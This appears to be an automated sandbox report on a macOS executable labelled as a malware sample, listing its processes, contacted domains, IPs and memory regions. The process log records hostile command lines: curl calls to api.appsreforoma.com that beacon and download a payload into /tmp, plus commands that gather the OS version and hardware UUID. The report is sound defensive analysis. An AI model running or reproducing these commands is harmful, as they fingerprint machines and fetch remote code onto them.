Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
malw_sampl
|
Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>
|
initial sample
|
 |
|
|
/dev/null
|
ASCII text, with CR, LF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/usr/libexec/xpcproxy
|
-
|
||
|
/usr/libexec/nsurlstoraged
|
/usr/libexec/nsurlstoraged --privileged
|
||
|
/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
|
-
|
||
|
/Users/bernard/Desktop/malw_sampl
|
/Users/bernard/Desktop/malw_sampl
|
||
|
/bin/sh
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/curl
|
curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/defaults
|
defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
|
||
|
/bin/sh
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/sbin/system_profiler
|
system_profiler SPHardwareDataType
|
||
|
/usr/sbin/system_profiler
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/awk
|
awk /UUID/ { print $3 }
|
||
|
/bin/sh
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/curl
|
curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1
|
||
|
/bin/sh
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/curl
|
curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593
|
||
|
/bin/sh
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/curl
|
curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3
|
||
|
/usr/libexec/xpcproxy
|
-
|
||
|
/usr/libexec/firmwarecheckers/eficheck/eficheck
|
/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
|
There are 16 hidden processes, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
api.appsreforoma.com
|
unknown
|
|
|
|
apis.apple.map.fastly.net
|
151.101.131.6
|
||
|
gateway.fe2.apple-dns.net
|
17.248.193.16
|
||
|
updates.cdn-apple.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.229.211.108
|
unknown
|
United States
|
||
|
151.101.131.6
|
apis.apple.map.fastly.net
|
United States
|
||
|
151.101.195.6
|
unknown
|
United States
|
||
|
151.101.67.6
|
unknown
|
United States
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1019db000
|
page execute read
|
|||
|
1117f5000
|
page read and write
|
|||
|
111829000
|
page readonly
|
|||
|
1019e7000
|
page read and write
|
|||
|
1019db000
|
page execute read
|
|||
|
1019e2000
|
page readonly
|
|||
|
1117f0000
|
page read and write
|
|||
|
1019e7000
|
page read and write
|
|||
|
1019e1000
|
page read and write
|
|||
|
1117f0000
|
page read and write
|
|||
|
1117f5000
|
page read and write
|
|||
|
111771000
|
page execute read
|
|||
|
1019e2000
|
page readonly
|
|||
|
111771000
|
page execute read
|
|||
|
111829000
|
page readonly
|
|||
|
1019e1000
|
page read and write
|
There are 6 hidden memdumps, click here to show them.